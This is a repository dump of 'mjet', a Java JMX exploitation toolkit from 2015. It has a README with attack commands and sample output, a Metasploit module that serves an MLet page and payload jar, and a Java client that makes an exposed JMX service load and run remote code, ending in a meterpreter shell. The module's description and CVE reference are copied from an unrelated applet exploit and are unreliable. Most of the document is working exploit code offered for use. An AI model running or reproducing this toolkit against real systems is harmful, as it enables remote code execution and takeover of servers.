[
  {
    "path": "LICENSE",
    "content": "The MIT License (MIT)\n\nCopyright (c) 2015 Mogwai Security\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n"
  },
  {
    "path": "README.md",
    "content": "# mjet\nMogwai Security Java Management Extensions (JMX) Exploitation Toolkit\n\nmjet is a tool that can be used to protect insecure configured JMX services. It is based on\nthe blog post \"Exploiting JMX-RMI\" from Braden Thomas/Accuvant \"http://www.accuvant.com/blog/exploiting-jmx-rmi\" \nand can be used to execute arbitrary Metasploit payloads on the target system.\n\nMjet was originally planned to be a complete attack toolkit, however we noticed that the Metasploit Github repository contains \na pull request which will provide basic Java RMI/serialization support in native ruby. This is awesome and removes the Java \ndependency. So we stopped developing this tool and create metasploit modules in the near future.\n\nmjet consists of the following parts:\n- A metasploit module which emulates a \"mlet Server\". This is basically a web server which hosts a html file that contains a mlet tag\n- A ManagedBean that is changed by the mlet server module to include the selected payload\n- A jar archive that is used to contact the insecure JMX service.\n\n\n### Installation (with the github version of Metasploit)\n- Copy the \"MBean\" folder to \"data/java/metasploit\"\n- Copy java_mlet_server.rb to \"modules/exploits/multi/misc/\"\n\n### Usage \n\nThe example uses following systems:\nattacker: 192.168.178.1\ntarget: 192.168.178.200, JMX service running on tcp port 1616\n\n- Configure/start the metasploit module \"java_mlet_server\". The module will run as a background job\n```\nmsf > use exploit/multi/misc/java_mlet_server\nmsf > set LHOST 192.168.178.1\nmsf > set SRVHOST 192.168.178.1\nmsf > set URIPATH /mlet/\nmsf > run\n```\n\nUse mjet.jar to connect to the vulnerable JMX service and provide the URL to the MLet Web server...\n```\njava -jar mjet.jar -t 192.168.178.200 -p 1616 -u http://192.168.178.1:8080/mlet/\n---------------------------------------------------\nMJET - Mogwai Security JMX Exploitation Toolkit 0.1\n---------------------------------------------------\n\n[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://192.168.178.200:1616/jmxrmi ...\n[+] Connected: rmi://192.168.178.164  5\n[+] Trying to create MLet bean...\n[+] Loaded javax.management.loading.MLet\n[+] Loading malicious MBean from http://192.168.178.1:8080/mlet/\n[+] Invoking: javax.management.loading.MLet.getMBeansFromURL\n[+] Loaded class: metasploit.Metasploit\n[+] Loaded MBean Server ID: ptIIirfM:name=BlPwaoHu,id=oWTqfkbE\n[+] Invoking: metasploit.Metasploit.run()\n[+] Done\n\n```\n\nand enjoy your meterpreter shell :-)\n\n"
  },
  {
    "path": "metasploit/java_mlet_server.rb",
    "content": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core'\nrequire 'rex'\n\nclass Metasploit3 < Msf::Exploit::Remote\n    Rank = ExcellentRanking\n\n    include Msf::Exploit::Remote::HttpServer::HTML\n\n    def initialize( info = {} )\n\n        super( update_info( info,\n        'Name'          => 'Java Mlet Server',\n        'Description'   => %q{\n            This module abuses the JMX classes from a Java Applet to run arbitrary Java\n            code outside of the sandbox as exploited in the wild in January of 2013. The\n            vulnerability affects Java version 7u10 and earlier.\n        },\n        'License'       => MSF_LICENSE,\n        'Author'        =>\n        [\n            'Unknown', # Vulnerability discovery\n            'egypt', # Metasploit module\n            'sinn3r', # Metasploit module\n            'juan vazquez' # Metasploit module\n        ],\n        'References'    =>\n        [\n            [ 'CVE', '2013-0422' ]\n\n        ],\n        'Platform'      => %w{ java linux osx win },\n        'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },\n        'Targets'       =>\n        [\n            [ 'Generic (Java Payload)',\n                {\n                    'Platform' => ['java'],\n                    'Arch' => ARCH_JAVA,\n                }\n            ],\n            [ 'Windows x86 (Native Payload)',\n                {\n                    'Platform' => 'win',\n                    'Arch' => ARCH_X86,\n                }\n            ],\n            [ 'Mac OS X x86 (Native Payload)',\n                {\n                    'Platform' => 'osx',\n                    'Arch' => ARCH_X86,\n                }\n            ],\n            [ 'Linux x86 (Native Payload)',\n                {\n                    'Platform' => 'linux',\n                    'Arch' => ARCH_X86,\n                }\n            ],\n        ],\n        'DefaultTarget'  => 0,\n        'DisclosureDate' => 'Jan 10 2013'\n        ))\n    end\n\n\n    def setup\n        path = File.join(Msf::Config.data_directory, \"java\", \"metasploit\", \"MBean\", \"Metasploit.class\")\n        @mbean_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n        path = File.join(Msf::Config.data_directory, \"java\", \"metasploit\", \"MBean\", \"MetasploitMBean.class\")\n        @interface_class = File.open(path, \"rb\") {|fd| fd.read(fd.stat.size) }\n\n        #@exploit_class_name = rand_text_alpha(\"Exploit\".length)\n        #@exploit_class.gsub!(\"Exploit\", @exploit_class_name)\n        super\n    end\n\n    def on_request_uri(cli, request)\n        print_status(\"handling request for #{request.uri}\")\n\n        case request.uri\n        when /\\.jar$/i\n            jar = payload.encoded_jar\n            jar.add_file(\"metasploit/Metasploit.class\", @mbean_class)\n            jar.add_file(\"metasploit/MetasploitMBean.class\", @interface_class)\n            #metasploit_str = rand_text_alpha(\"metasploit\".length)\n            #payload_str = rand_text_alpha(\"payload\".length)\n            #jar.entries.each { |entry|\n            #    entry.name.gsub!(\"metasploit\", metasploit_str)\n            #    entry.name.gsub!(\"Payload\", payload_str)\n            #    entry.data = entry.data.gsub(\"metasploit\", metasploit_str)\n            #    entry.data = entry.data.gsub(\"Payload\", payload_str)\n            #}\n            jar.build_manifest\n\n            send_response(cli, jar, { 'Content-Type' => \"application/octet-stream\" })\n        when /\\/$/\n            payload = regenerate_payload(cli)\n            if not payload\n                print_error(\"Failed to generate the payload.\")\n                send_not_found(cli)\n                return\n            end\n            send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })\n        else\n            send_redirect(cli, get_resource() + '/', '')\n        end\n\n    end\n\n    def generate_html\n        html = %Q|<mlet code=metasploit.Metasploit archive=#{rand_text_alpha(8)}.jar name=#{rand_text_alpha(8)}:name=#{rand_text_alpha(8)},id=#{rand_text_alpha(8)} ></mlet>|\n#        return html\n    end\n\nend\n"
  },
  {
    "path": "src/java/metasploit/MetasploitBean/.classpath",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classpath>\n\t<classpathentry kind=\"src\" path=\"src\"/>\n\t<classpathentry kind=\"con\" path=\"org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/JavaSE-1.6\"/>\n\t<classpathentry kind=\"output\" path=\"bin\"/>\n</classpath>\n"
  },
  {
    "path": "src/java/metasploit/MetasploitBean/.project",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<projectDescription>\n\t<name>MetasploitBean</name>\n\t<comment></comment>\n\t<projects>\n\t</projects>\n\t<buildSpec>\n\t\t<buildCommand>\n\t\t\t<name>org.eclipse.jdt.core.javabuilder</name>\n\t\t\t<arguments>\n\t\t\t</arguments>\n\t\t</buildCommand>\n\t</buildSpec>\n\t<natures>\n\t\t<nature>org.eclipse.jdt.core.javanature</nature>\n\t</natures>\n</projectDescription>\n"
  },
  {
    "path": "src/java/metasploit/MetasploitBean/.settings/org.eclipse.jdt.core.prefs",
    "content": "eclipse.preferences.version=1\norg.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled\norg.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6\norg.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve\norg.eclipse.jdt.core.compiler.compliance=1.6\norg.eclipse.jdt.core.compiler.debug.lineNumber=generate\norg.eclipse.jdt.core.compiler.debug.localVariable=generate\norg.eclipse.jdt.core.compiler.debug.sourceFile=generate\norg.eclipse.jdt.core.compiler.problem.assertIdentifier=error\norg.eclipse.jdt.core.compiler.problem.enumIdentifier=error\norg.eclipse.jdt.core.compiler.source=1.6\n"
  },
  {
    "path": "src/java/metasploit/MetasploitBean/src/metasploit/Metasploit.java",
    "content": "package metasploit;\n\n  \npublic class Metasploit implements MetasploitMBean {\n    public void run() {\n    \tPayload.main(null);\n    }\n}\n"
  },
  {
    "path": "src/java/metasploit/MetasploitBean/src/metasploit/MetasploitMBean.java",
    "content": "package metasploit;\n\npublic interface MetasploitMBean {\n    public void run();\n}\n\n\n"
  },
  {
    "path": "src/java/metasploit/MetasploitBean/src/metasploit/Payload.java",
    "content": "package metasploit;\n\npublic class Payload {\n\n\n\tpublic static void main(String[] args) {\n\t\tSystem.out.println(\"bla bla bla\");\n\n\t}\n\n}\n"
  },
  {
    "path": "src/java/mjet/.classpath",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classpath>\n\t<classpathentry kind=\"src\" path=\"src\"/>\n\t<classpathentry kind=\"con\" path=\"org.eclipse.jdt.launching.JRE_CONTAINER/org.eclipse.jdt.internal.debug.ui.launcher.StandardVMType/JavaSE-1.6\"/>\n\t<classpathentry kind=\"lib\" path=\"lib/commons-cli-1.2.jar\"/>\n\t<classpathentry kind=\"output\" path=\"bin\"/>\n</classpath>\n"
  },
  {
    "path": "src/java/mjet/.project",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<projectDescription>\n\t<name>mjet</name>\n\t<comment></comment>\n\t<projects>\n\t</projects>\n\t<buildSpec>\n\t\t<buildCommand>\n\t\t\t<name>org.eclipse.jdt.core.javabuilder</name>\n\t\t\t<arguments>\n\t\t\t</arguments>\n\t\t</buildCommand>\n\t</buildSpec>\n\t<natures>\n\t\t<nature>org.eclipse.jdt.core.javanature</nature>\n\t</natures>\n</projectDescription>\n"
  },
  {
    "path": "src/java/mjet/.settings/org.eclipse.jdt.core.prefs",
    "content": "eclipse.preferences.version=1\norg.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled\norg.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6\norg.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve\norg.eclipse.jdt.core.compiler.compliance=1.6\norg.eclipse.jdt.core.compiler.debug.lineNumber=generate\norg.eclipse.jdt.core.compiler.debug.localVariable=generate\norg.eclipse.jdt.core.compiler.debug.sourceFile=generate\norg.eclipse.jdt.core.compiler.problem.assertIdentifier=error\norg.eclipse.jdt.core.compiler.problem.enumIdentifier=error\norg.eclipse.jdt.core.compiler.source=1.6\n"
  },
  {
    "path": "src/java/mjet/src/de/mogwaisecurity/lab/mjet/Mjet.java",
    "content": "package de.mogwaisecurity.lab.mjet;\n\nimport org.apache.commons.cli.*;\nimport javax.management.remote.*;\nimport javax.management.*;\n\nimport java.util.*;\n\npublic class Mjet {\n\n\t/**\n\t * @param args\n\t */\n\tpublic static void main(String[] args) {\n\n\t\tSystem.out.println(\"---------------------------------------------------\");\n\t\tSystem.out.println(\"MJET - Mogwai Security JMX Exploitation Toolkit 0.1\");\n\t\tSystem.out.println(\"---------------------------------------------------\");\n\t\tSystem.out.println();\n\t\t\n\t\tCommandLineParser parser = new org.apache.commons.cli.BasicParser();\n\t\t\n\t\tOptions cmdOptions = createCmdOptions();\n\t\n\t\tCommandLine cmd= null;\n\t\t\n\t\ttry {\n\t\t\tcmd = parser.parse(cmdOptions, args);\t\t\t\t\n\t\t}\n\t\tcatch(ParseException exp) {\n\t\t    System.err.println( \"[-] Error: \" + exp.getMessage());\n\t\t    System.err.println();\n\t\t \n\t\t    // automatically generate the help statement\n\t\t    HelpFormatter formatter = new HelpFormatter();\n\t\t    formatter.printHelp( \"mjet\", cmdOptions );\n\t\t    System.exit(1);\n\t\t}\n\t\t\n\t\tpwnJMXService(cmd);\n\t}\n\n\tprivate static Options createCmdOptions()\n\t{\n\t\tOptions cmdOptions = new Options();\n\n\t\t// Required arguments\n\t\tOption targetOption = OptionBuilder.withArgName(\"host\").hasArg().withDescription(\"target host\").isRequired(true).create('t');\n\t\tOption portOption = OptionBuilder.withArgName(\"port\").hasArg().withDescription(\"target service port\").isRequired(true).create('p');\n\t\tOption urlOption = OptionBuilder.withArgName(\"url\").hasArg().withDescription(\"url of the mlet web server\").isRequired(true).create('u');\n\n\t\ttargetOption.setLongOpt(\"target\");\n\t\tportOption.setLongOpt(\"port\");\n\t\turlOption.setLongOpt(\"url\");\n\t\t\n\t\tcmdOptions.addOption(targetOption);\n\t\tcmdOptions.addOption(portOption);\n\t\tcmdOptions.addOption(urlOption);\t\t\n\t\t\n\t\t// Optional arguments\n\t\tOption helpOption = new Option(\"help\", false, \"show this help\");\n\t\tcmdOptions.addOption(helpOption);\n\t\t\n\t\treturn cmdOptions;\n\t}\n\t   \n\tstatic void pwnJMXService(CommandLine line) {\n\t\ttry {\n\t\t\tString serverName = line.getOptionValue(\"t\");\n\t\t\tString servicePort = line.getOptionValue(\"p\");\n\t\t\tString mLetUrl = line.getOptionValue(\"u\");\n\t        JMXServiceURL url = new JMXServiceURL(\"service:jmx:rmi:///jndi/rmi://\" + serverName + \":\" + servicePort +  \"/jmxrmi\");\n\t        \n\t        System.out.println(\"[+] Connecting to JMX URL: \"+url +\" ...\");\n\t      \n\t        JMXConnector connector = JMXConnectorFactory.connect(url);\n\t        MBeanServerConnection mBeanServer = connector.getMBeanServerConnection();\n\t            \n\t        System.out.println(\"[+] Connected: \" + connector.getConnectionId());\n\t      \n\t        ObjectInstance payloadBean = null;\n\n\t        System.out.println(\"[+] Trying to create MLet bean...\");\n\t        ObjectInstance mLetBean = null;\n\t        \n\t        try {\n\t        \tmLetBean = mBeanServer.createMBean(\"javax.management.loading.MLet\", null);\n\t        } catch (javax.management.InstanceAlreadyExistsException e) {\n\t        \tmLetBean = mBeanServer.getObjectInstance(new ObjectName(\"DefaultDomain:type=MLet\"));\n\t        }\n\t            \n\t        System.out.println(\"[+] Loaded \"+mLetBean.getClassName());\n\t        System.out.println(\"[+] Loading malicious MBean from \" + mLetUrl);\n\t        System.out.println(\"[+] Invoking: \"+mLetBean.getClassName() + \".getMBeansFromURL\");\t              \n\t        Object res = mBeanServer.invoke(mLetBean.getObjectName(), \"getMBeansFromURL\",\n\t        \t\tnew Object[] { mLetUrl },\n\t        \t\tnew String[] { String.class.getName() }\n\t            );\n\t        \n\t        HashSet res_set = ((HashSet)res);\n\t        Iterator itr = res_set.iterator();\n\t        Object nextObject = itr.next();\n\t       \n\t        if (nextObject instanceof Exception) {\n\t                throw ((Exception)nextObject);\n\t        }\n\t        payloadBean  = ((ObjectInstance)nextObject);\n\t           \n\t        System.out.println(\"[+] Loaded class: \"+ payloadBean.getClassName());\t            \n\t        System.out.println(\"[+] Loaded MBean Server ID: \"+ payloadBean.getObjectName());\n\t        System.out.println(\"[+] Invoking: \"+ payloadBean.getClassName()+\".run()\");\t             \n\t        \n\t        mBeanServer.invoke(payloadBean.getObjectName(), \"run\", new Object[]{}, new String[]{});\n\t        \n\t        System.out.println(\"[+] Done\");\n\t        \n\t\t} catch (Exception e) {\n\t\t\te.printStackTrace();\n\t    }\n\t}\n}\n"
  }
]